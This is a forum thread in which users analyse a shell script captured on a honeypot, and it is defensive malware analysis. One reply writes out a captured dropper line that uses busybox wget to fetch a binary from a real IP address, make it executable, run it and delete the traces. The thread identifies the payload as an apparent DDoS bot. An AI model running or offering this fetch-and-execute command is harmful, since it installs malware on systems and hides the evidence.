[SOLVED] Can someone explain for me this shell script please? (It was detected on my honeypot)

haz12 · 05-02-2016, 02:14 AM

Thanks

Turbocapitalist · 05-02-2016, 03:01 AM

If you post it between the two [code] and [/code] tags, it will be readable here.

Turbocapitalist · 05-02-2016, 08:40 AM

Looking at one 'line' it can be made more readable by putting each program on a separate line of its own.

Code:

busybox wget wget http://80.82.64.190/sparc; 
busybox chmod +x sparc; 
./sparc; 
busybox rm -f sparc*
rm -f *

busybox is a small system in a single binary. It's used, among other places, during the installation of the OS. It includes a few tools compiled in. wget, chmod, and rm are three of them. It's interesting enough that I would recommend reading a little about it on the net.

The first line has an error. wget is there twice. But the result will be the same, wget will fetch over HTTP the file "sparc" from the address specified. My guess, without looking at it, is that it is a binary with some kind of rootkit specific to the sparc architecture. The file is then made executable and then an attempt is made to run it. No telling from the script what it does if it is successful. But after it fails or is finished, busybox removes it. Then a general erasure of all files in the current directory takes place.

Then it tries the next file and so on.

The address used to download is in the Seychelles and registered to Quasi Networks LTD if the whois database is correct. There is an abuse contact give, it might be worth it to e-mail them.

pingu_penguin · 05-02-2016, 10:07 AM

basically the script is downloading files for all different types of architectures.
Could be a script too but I cant say.

It first clears the tmp folder , removes ps and strings and

for each architecture it does the following :

1. it downloads them
2. makes it executable (chmod +x)
3. runs the file
4. removes traces by deleting the original file.

The second half does the same by copying the busybox binary into the current folder (probably thinking he doesnt have the busybox binary in his path - a guess here)

The third half does the same except it executes the downloaded files from the /tmp/<arch> binary and removes traces again - since the /tmp directory is world writable.

Habitual · 05-02-2016, 10:18 AM

I judge the code/script be attempting to secure their hold on the system.

pingu_penguin · 05-02-2016, 10:27 AM

lol that site is still alive , its downloading a bin file for all architectures.

I just tried http http://80.82.64.190 in firefox ^.^ to see a Apache test page.

Habitual · 05-02-2016, 10:35 AM

because where there is one...

Code:

sudo iptables -I INPUT -s 80.82.64.0/24 -j REJECT --reject-with icmp-host-unreachable

I'm too paranoid for honeypots.

rtmistler · 05-02-2016, 11:19 AM

I agree with Habitual. All those chmod and rm -rf statements, sandwiched around running the downloaded file.

I would avoid that script. And the term "honeypot" whatever it really means, slang or no, sounds dirty from the get-go.

Ihatewindows522 · 05-02-2016, 11:34 AM

Well, here's where your script is coming from:
https://www.google.com/maps/place/Vi...e3e07e7e6c3cde

Found that by a whois report. Also here's the nmap report.

https://drive.google.com/open?id=0B6...zZEUXoxX0xWVWc

Downloaded one of the binaries, the one called "x86"...
https://www.virustotal.com/en/file/6...is/1462206823/
Looks like a DDOS bot.